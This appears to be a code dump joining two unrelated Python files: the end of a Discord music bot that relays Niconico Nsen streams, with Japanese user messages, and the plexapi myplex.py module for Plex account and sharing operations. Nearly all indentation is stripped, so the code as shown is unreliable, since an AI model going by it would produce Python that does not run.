if message.content.startswith(self.prefix + "channel"):
result = getRegex("channel", message.content)
if result:
if result not in [x["name"] for x in self.nsen.channelNames] + [y for x in self.nsen.channelNames for y in x["alias"]]:
await self.client.send_message(self.textChannel, "{} 与えられたチャンネル **{}** は不正です。詳しくは`help`コマンドをご利用ください。".format(message.author.mention, result))
return True
if result in [y for x in self.nsen.channelNames for y in x["alias"]]:
result = [x["name"] for x in self.nsen.channelNames if result in x["alias"]][0]
self.nsenChannel = result
self.musicQueue = []
self.nsen.setChannel(self.nsenChannel)
self.player.stop()
await self.client.send_message(self.textChannel, "{} 再生キューを初期化し、チャンネルを **{}** に変更します。".format(message.author.mention, [x["title"] for x in self.nsen.channelNames if x["name"] == self.nsenChannel][0]))
return True
elif message.content.startswith(self.prefix + "queue"):
if self.musicQueue:
await self.client.send_message(self.textChannel, "{} 現在の再生キューです。\n\n{}".format(message.author.mention, "\n".join(["{}. {}".format(i + 1, t["title"]) for i, t in enumerate(self.musicQueue)])))
else:
await self.client.send_message(self.textChannel, "{} 現在の再生キューは空です。".format(message.author.mention))
return True
elif message.content.startswith(self.prefix + "skip"):
if self.musicQueue:
if message.author.id in self.currentVote:
await self.client.send_message(self.textChannel, "{} すでにスキップ投票をしているため、もう投票できません。".format(message.author.mention))
else:
self.currentVote.append(message.author.id)
if len(self.currentVote) >= self.needVotes:
self.player.stop()
await self.client.send_message(self.textChannel, "{} {}票の投票が得られたため、現在の曲をスキップします。".format(message.author.mention, self.needVotes))
else:
await self.client.send_message(self.textChannel, "{} スキップ投票を受け付けました。".format(message.author.mention, self.needVotes))
else:
await self.client.send_message(self.textChannel, "{} 現在の再生キューは空であるため、スキップできません。".format(message.author.mention))
return True
elif message.content.startswith(self.prefix + "volume"):
result = getRegex("volume", message.content)
if result and result != 0:
if result.isdigit():
self.volume = round(int(result) / 100, 2)
await self.client.send_message(self.textChannel, "{} 音量を {}% に変更しました。".format(message.author.mention, int(self.volume * 100)))
return True
elif result.startswith("+") or result.startswith("-"):
sign = result[0]
value = int(result[1:]) if result[1:].isdigit() else None
if value:
value = round((1 if sign == "+" else -1) * value / 100, 2)
if self.volume > value:
self.volume += value
await self.client.send_message(self.textChannel, "{} 音量を {}% に変更しました。".format(message.author.mention, int(self.volume * 100)))
return True
await self.client.send_message(self.textChannel, "{} 現在の音量は {}% です。".format(message.author.mention, int(self.volume * 100)))
return True
if message.content.startswith(self.prefix):
helps = [
["channel [str]", "Nsenチャンネルを [str] に変更します。変更可能なチャンネルは {} です。".format(", ".join(["{} ({})".format(x["name"], ", ".join(x["alias"])) for x in self.nsen.channelNames]))],
["queue", "現在の再生キューを返します。"],
["skip", "現在の曲をスキップする投票を始めます。"],
["volume", "現在の音量を返します。"],
["volume [int]", "音量を [int]% に変更します。"],
["volume [+ または -][int]", "音量を [int]% だけ増加または減少させます。"]
]
await self.client.send_message(
self.textChannel,
"{} Nsen Music Botコマンド一覧:\n\n"
"```\n"
"{}"
"\n\n```".format(
message.author.mention,
"\n\n".join(["{0}{1[0]}\n {1[1]}".format(self.prefix, data) for data in helps])
)
)
@property
def volume(self):
return self._volume
@volume.setter
def volume(self, value):
self._volume = value
if self.player:
if self.player.is_playing():
self.player.volume = self._volume
@property
def playing(self):
        return self._playing
@playing.setter
def playing(self, value):
self._playing = value
if self.player:
if not value and self.player.is_playing():
self.player.stop()
async def loopTrack(self):
while self.running:
await self.goNextTrack()
async def goNextTrack(self):
while True:
track = await self.getTrack()
try:
if not self.playing:
await asyncio.sleep(10)
continue
await self.client.send_typing(self.textChannel)
self.player = self.voiceClient.create_ffmpeg_player(track["path"], use_avconv=True)
self.player.volume = self.volume
self.player.start()
self.currentVote = []
await self.client.purge_from(self.textChannel, limit=50, check=lambda x: x.author == self.client.user)
await self.client.send_message(self.textChannel, track["text"])
await self.client.change_presence(game=discord.Game(name=track["title"]))
self.logger.info(track["text"])
while True:
await asyncio.sleep(1)
if self.player.is_done():
await self.client.change_presence(game=None)
break
except:
self.logger.exception("Error occured while goNextTrack")
await asyncio.sleep(10)
async def getTrack(self):
while len(self.musicQueue) == 0:
await asyncio.sleep(1)
t = self.musicQueue.pop(0)
self.currentVideoPath = t["path"]
return t
def syncNsen(self):
previousId = None
while True:
try:
data = self.nsen.getPlayerStatus()
self.logger.debug(data)
if "error" in data:
self.nsen.setChannel(self.nsenChannel)
time.sleep(10)
continue
videoId = self.nsen.getVideoID(data)
self.logger.debug(videoId)
if videoId == previousId and self.nsen.channelName != "hotaru":
time.sleep(10)
continue
if not videoId:
self.nsen.setChannel(self.nsenChannel)
time.sleep(10)
continue
ckey = self.nsen.getCKey(videoId)
self.logger.debug(ckey)
data2 = self.nsen.getFLV(videoId, ckey)
self.logger.debug(data2)
if "url" not in data2:
self.nsen.setChannel(self.nsenChannel)
time.sleep(10)
continue
duration = int(data["stream"]["contents_list"]["contents"]["@duration"])
obj = {
"path": "{}/{}_{}.flv".format(self.tmpDir, self.nsen.channelName, videoId),
"text": ":nsen: Now Playing: **{title}** ({time}) - {channelName}\nhttp://www.nicovideo.jp/watch/{id}".format(
title=html.unescape(data["stream"]["contents_list"]["contents"]["@title"]),
time="{0[0]}:{0[1]:02d}".format(divmod(duration, 60)),
channelName=data["stream"]["title"],
id=videoId
),
"title": html.unescape(data["stream"]["contents_list"]["contents"]["@title"])
}
previousId = videoId
if not os.path.isfile(obj["path"]):
command = self.nsen.generateCommand(obj["path"], data2["url"], data2["fmst"])
result = self.nsen.executeRecordCommand(command)
self.logger.info("Record Command Result =\n{}\n".format(result))
self.musicQueue.append(obj)
except:
self.logger.exception("Error occured while syncNsen")
time.sleep(10)
else:
time.sleep(30)
def cleanUpTmpDir(self):
while True:
time.sleep(self.cleanUpInterval)
for x in os.listdir(self.tmpDir):
path = "{}/{}".format(self.tmpDir, x)
if path != self.currentVideoPath:
os.remove(path)
def loginNsen(self):
while True:
time.sleep(60 * 60 * 2)
try:
self.nsen.login(self.config["niconico"]["email"], self.config["niconico"]["password"])
except:
pass
def run(self):
self.running = True
if not os.path.isfile(self.nsenIcon):
with open(self.nsenIcon, "wb") as f:
f.write(requests.get("http://live.nicovideo.jp/img/nsen/waitlist_icon_nsen.png").content)
self.nsenThread.start()
self.cleanUpThread.start()
self.reloginThread.start()
self.client.run(self.config["bot"]["token"])
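# --- Editor's note (hedged sketch, not part of the original source) ---
# The bot above reads its credentials from self.config; the shape below is
# inferred from the lookups in run() and loginNsen() (config["bot"]["token"],
# config["niconico"]["email"], config["niconico"]["password"]). Any further
# keys are assumptions.
#
#     config = {
#         "bot": {"token": "YOUR_DISCORD_BOT_TOKEN"},
#         "niconico": {"email": "you@example.com", "password": "your-password"},
#     }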
|
myplex.py
|
# -*- coding: utf-8 -*-
import copy
import threading
import time
import requests
from plexapi import (BASE_HEADERS, CONFIG, TIMEOUT, X_PLEX_ENABLE_FAST_CONNECT,
X_PLEX_IDENTIFIER, log, logfilter, utils)
from plexapi.base import PlexObject
from plexapi.exceptions import BadRequest, NotFound, Unauthorized
from plexapi.client import PlexClient
from plexapi.compat import ElementTree
from plexapi.library import LibrarySection
from plexapi.server import PlexServer
from plexapi.sync import SyncItem, SyncList
from plexapi.utils import joinArgs
from requests.status_codes import _codes as codes
class MyPlexAccount(PlexObject):
""" MyPlex account and profile information. This object represents the data found Account on
the myplex.tv servers at the url https://plex.tv/users/account. You may create this object
directly by passing in your username & password (or token). There is also a convenience
method provided at :class:`~plexapi.server.PlexServer.myPlexAccount()` which will create
and return this object.
Parameters:
username (str): Your MyPlex username.
password (str): Your MyPlex password.
session (requests.Session, optional): Use your own session object if you want to
cache the http responses from PMS
timeout (int): timeout in seconds on initial connect to myplex (default config.TIMEOUT).
Attributes:
SIGNIN (str): 'https://plex.tv/users/sign_in.xml'
key (str): 'https://plex.tv/users/account'
authenticationToken (str): Unknown.
certificateVersion (str): Unknown.
cloudSyncDevice (str): Unknown.
email (str): Your current Plex email address.
            entitlements (List<str>): List of devices you're allowed to use with this account.
guest (bool): Unknown.
home (bool): Unknown.
homeSize (int): Unknown.
id (str): Your Plex account ID.
locale (str): Your Plex locale
mailing_list_status (str): Your current mailing list status.
maxHomeSize (int): Unknown.
queueEmail (str): Email address to add items to your `Watch Later` queue.
queueUid (str): Unknown.
restricted (bool): Unknown.
            roles: (List<str>) List of account roles. Plexpass membership is listed here.
scrobbleTypes (str): Description
secure (bool): Description
            subscriptionActive (bool): True if your subscription is active.
subscriptionFeatures: (List<str>) List of features allowed on your subscription.
subscriptionPlan (str): Name of subscription plan.
subscriptionStatus (str): String representation of `subscriptionActive`.
thumb (str): URL of your account thumbnail.
title (str): Unknown. - Looks like an alias for `username`.
username (str): Your account username.
uuid (str): Unknown.
_token (str): Token used to access this client.
_session (obj): Requests session object used to access this client.
"""
FRIENDINVITE = 'https://plex.tv/api/servers/{machineId}/shared_servers' # post with data
HOMEUSERCREATE = 'https://plex.tv/api/home/users?title={title}' # post with data
EXISTINGUSER = 'https://plex.tv/api/home/users?invitedEmail={username}' # post with data
FRIENDSERVERS = 'https://plex.tv/api/servers/{machineId}/shared_servers/{serverId}' # put with data
PLEXSERVERS = 'https://plex.tv/api/servers/{machineId}' # get
FRIENDUPDATE = 'https://plex.tv/api/friends/{userId}' # put with args, delete
REMOVEHOMEUSER = 'https://plex.tv/api/home/users/{userId}' # delete
REMOVEINVITE = 'https://plex.tv/api/invites/requested/{userId}?friend=0&server=1&home=0' # delete
REQUESTED = 'https://plex.tv/api/invites/requested' # get
REQUESTS = 'https://plex.tv/api/invites/requests' # get
SIGNIN = 'https://plex.tv/users/sign_in.xml' # get with auth
WEBHOOKS = 'https://plex.tv/api/v2/user/webhooks' # get, post with data
# Hub sections
VOD = 'https://vod.provider.plex.tv/' # get
WEBSHOWS = 'https://webshows.provider.plex.tv/' # get
NEWS = 'https://news.provider.plex.tv/' # get
PODCASTS = 'https://podcasts.provider.plex.tv/' # get
MUSIC = 'https://music.provider.plex.tv/' # get
# Key may someday switch to the following url. For now the current value works.
# https://plex.tv/api/v2/user?X-Plex-Token={token}&X-Plex-Client-Identifier={clientId}
key = 'https://plex.tv/users/account'
def __init__(self, username=None, password=None, token=None, session=None, timeout=None):
self._token = token
self._session = session or requests.Session()
data, initpath = self._signin(username, password, timeout)
super(MyPlexAccount, self).__init__(self, data, initpath)
def _signin(self, username, password, timeout):
if self._token:
return self.query(self.key), self.key
username = username or CONFIG.get('auth.myplex_username')
password = password or CONFIG.get('auth.myplex_password')
data = self.query(self.SIGNIN, method=self._session.post, auth=(username, password), timeout=timeout)
return data, self.SIGNIN
def _loadData(self, data):
""" Load attribute values from Plex XML response. """
self._data = data
self._token = logfilter.add_secret(data.attrib.get('authenticationToken'))
self._webhooks = []
self.authenticationToken = self._token
self.certificateVersion = data.attrib.get('certificateVersion')
self.cloudSyncDevice = data.attrib.get('cloudSyncDevice')
self.email = data.attrib.get('email')
self.guest = utils.cast(bool, data.attrib.get('guest'))
self.home = utils.cast(bool, data.attrib.get('home'))
self.homeSize = utils.cast(int, data.attrib.get('homeSize'))
self.id = data.attrib.get('id')
self.locale = data.attrib.get('locale')
self.mailing_list_status = data.attrib.get('mailing_list_status')
self.maxHomeSize = utils.cast(int, data.attrib.get('maxHomeSize'))
self.queueEmail = data.attrib.get('queueEmail')
self.queueUid = data.attrib.get('queueUid')
self.restricted = utils.cast(bool, data.attrib.get('restricted'))
self.scrobbleTypes = data.attrib.get('scrobbleTypes')
self.secure = utils.cast(bool, data.attrib.get('secure'))
self.thumb = data.attrib.get('thumb')
self.title = data.attrib.get('title')
self.username = data.attrib.get('username')
self.uuid = data.attrib.get('uuid')
subscription = data.find('subscription')
self.subscriptionActive = utils.cast(bool, subscription.attrib.get('active'))
self.subscriptionStatus = subscription.attrib.get('status')
self.subscriptionPlan = subscription.attrib.get('plan')
self.subscriptionFeatures = []
for feature in subscription.iter('feature'):
self.subscriptionFeatures.append(feature.attrib.get('id'))
roles = data.find('roles')
self.roles = []
if roles:
for role in roles.iter('role'):
self.roles.append(role.attrib.get('id'))
entitlements = data.find('entitlements')
self.entitlements = []
for entitlement in entitlements.iter('entitlement'):
self.entitlements.append(entitlement.attrib.get('id'))
# TODO: Fetch missing MyPlexAccount attributes
self.profile_settings = None
self.services = None
self.joined_at = None
def device(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexDevice` that matches the name specified.
Parameters:
name (str): Name to match against.
"""
for device in self.devices():
if device.name.lower() == name.lower():
return device
raise NotFound('Unable to find device %s' % name)
def devices(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexDevice` objects connected to the server. """
data = self.query(MyPlexDevice.key)
return [MyPlexDevice(self, elem) for elem in data]
def _headers(self, **kwargs):
""" Returns dict containing base headers for all requests to the server. """
headers = BASE_HEADERS.copy()
if self._token:
headers['X-Plex-Token'] = self._token
headers.update(kwargs)
return headers
def query(self, url, method=None, headers=None, timeout=None, **kwargs):
method = method or self._session.get
timeout = timeout or TIMEOUT
log.debug('%s %s %s', method.__name__.upper(), url, kwargs.get('json', ''))
headers = self._headers(**headers or {})
response = method(url, headers=headers, timeout=timeout, **kwargs)
if response.status_code not in (200, 201, 204): # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
message = '(%s) %s; %s %s' % (response.status_code, codename, response.url, errtext)
if response.status_code == 401:
raise Unauthorized(message)
elif response.status_code == 404:
raise NotFound(message)
else:
raise BadRequest(message)
data = response.text.encode('utf8')
return ElementTree.fromstring(data) if data.strip() else None
def resource(self, name):
""" Returns the :class:`~plexapi.myplex.MyPlexResource` that matches the name specified.
Parameters:
name (str): Name to match against.
"""
for resource in self.resources():
if resource.name.lower() == name.lower():
return resource
raise NotFound('Unable to find resource %s' % name)
def resources(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexResource` objects connected to the server. """
data = self.query(MyPlexResource.key)
return [MyPlexResource(self, elem) for elem in data]
def inviteFriend(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None).
[Section] must be defined in order to update shared sections.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
username = user.username if isinstance(user, MyPlexUser) else user
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(machineId, sections)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_email': username},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
headers = {'Content-Type': 'application/json'}
url = self.FRIENDINVITE.format(machineId=machineId)
return self.query(url, self._session.post, json=params, headers=headers)
def createHomeUser(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None shares all sections).
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(server, sections)
headers = {'Content-Type': 'application/json'}
url = self.HOMEUSERCREATE.format(title=user)
# UserID needs to be created and referenced when adding sections
user_creation = self.query(url, self._session.post, headers=headers)
userIds = {}
for elem in user_creation.findall("."):
# Find userID
userIds['id'] = elem.attrib.get('id')
log.debug(userIds)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_id': userIds['id']},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
url = self.FRIENDINVITE.format(machineId=machineId)
library_assignment = self.query(url, self._session.post, json=params, headers=headers)
return user_creation, library_assignment
def createExistingUser(self, user, server, sections=None, allowSync=False, allowCameraUpload=False,
allowChannels=False, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Share library content with the specified user.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections ([Section]): Library sections, names or ids to be shared (default None shares all sections).
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
headers = {'Content-Type': 'application/json'}
# If user already exists, carry over sections and settings.
if isinstance(user, MyPlexUser):
username = user.username
elif user in [_user.username for _user in self.users()]:
username = self.user(user).username
else:
            # If the user does not already exist, treat the request as a new request and include sections and settings.
newUser = user
url = self.EXISTINGUSER.format(username=newUser)
user_creation = self.query(url, self._session.post, headers=headers)
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(server, sections)
params = {
'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_email': newUser},
'sharing_settings': {
'allowSync': ('1' if allowSync else '0'),
'allowCameraUpload': ('1' if allowCameraUpload else '0'),
'allowChannels': ('1' if allowChannels else '0'),
'filterMovies': self._filterDictToStr(filterMovies or {}),
'filterTelevision': self._filterDictToStr(filterTelevision or {}),
'filterMusic': self._filterDictToStr(filterMusic or {}),
},
}
url = self.FRIENDINVITE.format(machineId=machineId)
library_assignment = self.query(url, self._session.post, json=params, headers=headers)
return user_creation, library_assignment
url = self.EXISTINGUSER.format(username=username)
return self.query(url, self._session.post, headers=headers)
def removeFriend(self, user):
""" Remove the specified user from all sharing.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
"""
user = self.user(user)
url = self.FRIENDUPDATE if user.friend else self.REMOVEINVITE
url = url.format(userId=user.id)
return self.query(url, self._session.delete)
def removeHomeUser(self, user):
""" Remove the specified managed user from home.
Parameters:
user (str): MyPlexUser, username, email of the user to be removed from home.
"""
user = self.user(user)
url = self.REMOVEHOMEUSER.format(userId=user.id)
return self.query(url, self._session.delete)
def updateFriend(self, user, server, sections=None, removeSections=False, allowSync=None, allowCameraUpload=None,
allowChannels=None, filterMovies=None, filterTelevision=None, filterMusic=None):
""" Update the specified user's share settings.
Parameters:
user (str): MyPlexUser, username, email of the user to be added.
server (PlexServer): PlexServer object or machineIdentifier containing the library sections to share.
sections: ([Section]): Library sections, names or ids to be shared (default None).
[Section] must be defined in order to update shared sections.
removeSections (Bool): Set True to remove all shares. Supersedes sections.
allowSync (Bool): Set True to allow user to sync content.
allowCameraUpload (Bool): Set True to allow user to upload photos.
allowChannels (Bool): Set True to allow user to utilize installed channels.
filterMovies (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterTelevision (Dict): Dict containing key 'contentRating' and/or 'label' each set to a list of
values to be filtered. ex: {'contentRating':['G'], 'label':['foo']}
filterMusic (Dict): Dict containing key 'label' set to a list of values to be filtered.
ex: {'label':['foo']}
"""
# Update friend servers
response_filters = ''
response_servers = ''
user = user if isinstance(user, MyPlexUser) else self.user(user)
machineId = server.machineIdentifier if isinstance(server, PlexServer) else server
sectionIds = self._getSectionIds(machineId, sections)
headers = {'Content-Type': 'application/json'}
# Determine whether user has access to the shared server.
user_servers = [s for s in user.servers if s.machineIdentifier == machineId]
if user_servers and sectionIds:
serverId = user_servers[0].id
params = {'server_id': machineId, 'shared_server': {'library_section_ids': sectionIds}}
url = self.FRIENDSERVERS.format(machineId=machineId, serverId=serverId)
else:
params = {'server_id': machineId,
'shared_server': {'library_section_ids': sectionIds, 'invited_id': user.id}}
url = self.FRIENDINVITE.format(machineId=machineId)
# Remove share sections, add shares to user without shares, or update shares
if not user_servers or sectionIds:
if removeSections is True:
response_servers = self.query(url, self._session.delete, json=params, headers=headers)
elif 'invited_id' in params.get('shared_server', ''):
response_servers = self.query(url, self._session.post, json=params, headers=headers)
else:
response_servers = self.query(url, self._session.put, json=params, headers=headers)
else:
            log.warning('A section name, number, or section object is required to change library sections')
# Update friend filters
url = self.FRIENDUPDATE.format(userId=user.id)
params = {}
if isinstance(allowSync, bool):
params['allowSync'] = '1' if allowSync else '0'
if isinstance(allowCameraUpload, bool):
params['allowCameraUpload'] = '1' if allowCameraUpload else '0'
if isinstance(allowChannels, bool):
params['allowChannels'] = '1' if allowChannels else '0'
        if isinstance(filterMovies, dict):
            params['filterMovies'] = self._filterDictToStr(filterMovies or {})
        if isinstance(filterTelevision, dict):
            params['filterTelevision'] = self._filterDictToStr(filterTelevision or {})
        if isinstance(filterMusic, dict):
            params['filterMusic'] = self._filterDictToStr(filterMusic or {})
if params:
url += joinArgs(params)
response_filters = self.query(url, self._session.put)
return response_servers, response_filters
def user(self, username):
""" Returns the :class:`~plexapi.myplex.MyPlexUser` that matches the email or username specified.
Parameters:
username (str): Username, email or id of the user to return.
"""
for user in self.users():
# Home users don't have email, username etc.
if username.lower() == user.title.lower():
return user
elif (user.username and user.email and user.id and username.lower() in
(user.username.lower(), user.email.lower(), str(user.id))):
return user
raise NotFound('Unable to find user %s' % username)
def users(self):
""" Returns a list of all :class:`~plexapi.myplex.MyPlexUser` objects connected to your account.
This includes both friends and pending invites. You can reference the user.friend to
distinguish between the two.
"""
friends = [MyPlexUser(self, elem) for elem in self.query(MyPlexUser.key)]
requested = [MyPlexUser(self, elem, self.REQUESTED) for elem in self.query(self.REQUESTED)]
return friends + requested
def _getSectionIds(self, server, sections):
""" Converts a list of section objects or names to sectionIds needed for library sharing. """
if not sections: return []
# Get a list of all section ids for looking up each section.
allSectionIds = {}
machineIdentifier = server.machineIdentifier if isinstance(server, PlexServer) else server
url = self.PLEXSERVERS.replace('{machineId}', machineIdentifier)
data = self.query(url, self._session.get)
for elem in data[0]:
allSectionIds[elem.attrib.get('id', '').lower()] = elem.attrib.get('id')
allSectionIds[elem.attrib.get('title', '').lower()] = elem.attrib.get('id')
allSectionIds[elem.attrib.get('key', '').lower()] = elem.attrib.get('id')
log.debug(allSectionIds)
# Convert passed in section items to section ids from above lookup
sectionIds = []
for section in sections:
sectionKey = section.key if isinstance(section, LibrarySection) else section
sectionIds.append(allSectionIds[sectionKey.lower()])
return sectionIds
def _filterDictToStr(self, filterDict):
""" Converts friend filters to a string representation for transport. """
values = []
for key, vals in filterDict.items():
if key not in ('contentRating', 'label'):
                raise BadRequest('Unknown filter key: %s' % key)
values.append('%s=%s' % (key, '%2C'.join(vals)))
return '|'.join(values)
def addWebhook(self, url):
# copy _webhooks and append url
urls = self._webhooks[:] + [url]
return self.setWebhooks(urls)
def deleteWebhook(self, url):
urls = copy.copy(self._webhooks)
if url not in urls:
raise BadRequest('Webhook does not exist: %s' % url)
urls.remove(url)
return self.setWebhooks(urls)
def setWebhooks(self, urls):
log.info('Setting webhooks: %s' % urls)
data = {'urls[]': urls} if len(urls) else {'urls': ''}
data = self.query(self.WEBHOOKS, self._session.post, data=data)
self._webhooks = self.listAttrs(data, 'url', etag='webhook')
return self._webhooks
def webhooks(self):
data = self.query(self.WEBHOOKS)
self._webhooks = self.listAttrs(data, 'url', etag='webhook')
return self._webhooks
def optOut(self, playback=None, library=None):
""" Opt in or out of sharing stuff with plex.
See: https://www.plex.tv/about/privacy-legal/
"""
params = {}
if playback is not None:
params['optOutPlayback'] = int(playback)
if library is not None:
params['optOutLibraryStats'] = int(library)
url = 'https://plex.tv/api/v2/user/privacy'
return self.query(url, method=self._session.put, data=params)
def syncItems(self, client=None, clientId=None):
""" Returns an instance of :class:`plexapi.sync.SyncList` for specified client.
Parameters:
client (:class:`~plexapi.myplex.MyPlexDevice`): a client to query SyncItems for.
clientId (str): an identifier of a client to query SyncItems for.
            If both `client` and `clientId` are provided, the client is preferred.
            If neither `client` nor `clientId` is provided, the clientId is set to the current client's identifier.
"""
if client:
clientId = client.clientIdentifier
elif clientId is None:
clientId = X_PLEX_IDENTIFIER
data = self.query(SyncList.key.format(clientId=clientId))
return SyncList(self, data)
def sync(self, sync_item, client=None, clientId=None):
""" Adds specified sync item for the client. It's always easier to use methods defined directly in the media
objects, e.g. :func:`plexapi.video.Video.sync`, :func:`plexapi.audio.Audio.sync`.
Parameters:
client (:class:`~plexapi.myplex.MyPlexDevice`): a client for which you need to add SyncItem to.
clientId (str): an identifier of a client for which you need to add SyncItem to.
sync_item (:class:`plexapi.sync.SyncItem`): prepared SyncItem object with all fields set.
            If both `client` and `clientId` are provided, the client is preferred.
            If neither `client` nor `clientId` is provided, the clientId is set to the current client's identifier.
Returns:
:class:`plexapi.sync.SyncItem`: an instance of created syncItem.
Raises:
                :class:`plexapi.exceptions.BadRequest`: when a client with the provided clientId wasn't found.
                :class:`plexapi.exceptions.BadRequest`: when the provided client doesn't provide `sync-target`.
"""
if not client and not clientId:
clientId = X_PLEX_IDENTIFIER
if not client:
for device in self.devices():
if device.clientIdentifier == clientId:
client = device
break
if not client:
                raise BadRequest('Unable to find client by clientId=%s' % clientId)
if 'sync-target' not in client.provides:
            raise BadRequest('Provided client does not provide sync-target')
params = {
'SyncItem[title]': sync_item.title,
'SyncItem[rootTitle]': sync_item.rootTitle,
'SyncItem[metadataType]': sync_item.metadataType,
'SyncItem[machineIdentifier]': sync_item.machineIdentifier,
'SyncItem[contentType]': sync_item.contentType,
'SyncItem[Policy][scope]': sync_item.policy.scope,
'SyncItem[Policy][unwatched]': str(int(sync_item.policy.unwatched)),
'SyncItem[Policy][value]': str(sync_item.policy.value if hasattr(sync_item.policy, 'value') else 0),
'SyncItem[Location][uri]': sync_item.location,
'SyncItem[MediaSettings][audioBoost]': str(sync_item.mediaSettings.audioBoost),
'SyncItem[MediaSettings][maxVideoBitrate]': str(sync_item.mediaSettings.maxVideoBitrate),
'SyncItem[MediaSettings][musicBitrate]': str(sync_item.mediaSettings.musicBitrate),
'SyncItem[MediaSettings][photoQuality]': str(sync_item.mediaSettings.photoQuality),
'SyncItem[MediaSettings][photoResolution]': sync_item.mediaSettings.photoResolution,
'SyncItem[MediaSettings][subtitleSize]': str(sync_item.mediaSettings.subtitleSize),
'SyncItem[MediaSettings][videoQuality]': str(sync_item.mediaSettings.videoQuality),
'SyncItem[MediaSettings][videoResolution]': sync_item.mediaSettings.videoResolution,
}
url = SyncList.key.format(clientId=client.clientIdentifier)
data = self.query(url, method=self._session.post, headers={
'Content-type': 'x-www-form-urlencoded',
}, params=params)
return SyncItem(self, data, None, clientIdentifier=client.clientIdentifier)
def claimToken(self):
""" Returns a str, a new "claim-token", which you can use to register your new Plex Server instance to your
account.
See: https://hub.docker.com/r/plexinc/pms-docker/, https://www.plex.tv/claim/
"""
response = self._session.get('https://plex.tv/api/claim/token.json', headers=self._headers(), timeout=TIMEOUT)
if response.status_code not in (200, 201, 204): # pragma: no cover
codename = codes.get(response.status_code)[0]
errtext = response.text.replace('\n', ' ')
raise BadRequest('(%s) %s %s; %s' % (response.status_code, codename, response.url, errtext))
return response.json()['token']
def history(self, maxresults=9999999, mindate=None):
""" Get Play History for all library sections on all servers for the owner.
Parameters:
maxresults (int): Only return the specified number of results (optional).
mindate (datetime): Min datetime to return results from.
"""
servers = [x for x in self.resources() if x.provides == 'server' and x.owned]
hist = []
for server in servers:
conn = server.connect()
hist.extend(conn.history(maxresults=maxresults, mindate=mindate, accountID=1))
return hist
def videoOnDemand(self):
""" Returns a list of VOD Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.VOD + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def webShows(self):
""" Returns a list of Webshow Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.WEBSHOWS + 'hubs/', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
def news(self):
""" Returns a list of News Hub items :class:`~plexapi.library.Hub`
"""
req = requests.get(self.NEWS + 'hubs/sections/all', headers={'X-Plex-Token': self._token})
elem = ElementTree.fromstring(req.text)
return self.findItems(elem)
